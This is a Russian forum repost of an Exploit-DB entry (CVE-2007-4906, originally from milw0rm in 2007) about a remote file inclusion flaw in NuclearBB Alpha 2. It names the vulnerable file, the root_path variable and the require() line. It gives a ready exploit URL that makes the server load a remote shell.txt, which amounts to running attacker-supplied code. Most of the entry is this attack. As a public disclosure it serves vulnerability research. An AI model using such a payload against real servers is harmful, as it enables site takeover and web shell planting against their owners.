- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 4395
- Проверка EDB
-
- Пройдено
- Автор
- ROOTSHELL SECURITY
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2007-4906
- Дата публикации
- 2007-09-11
Код:
Vuln Product: NuclearBB Alpha 2
Vendor: http://www.nuclearbb.com/
Vulnerability Type: Remote File Inclusion
Autor: Infection
Team: Rootshell Security Team
Vulnerable file: /NuclearBB/tasks/send_queued_emails.php
Exploit URL: http://localhost/NuclearBB/tasks/send_queued_emails.php?root_path=http://localhost/shell.txt?
Method: get
Register_globals: On
Vulnerable variable: root_path
Line number: 14
Lines:
----------------------------------------------
require("$root_path/inc/functions_email.php");
$mail = new email;
----------------------------------------------
# milw0rm.com [2007-09-11]- Источник
- www.exploit-db.com
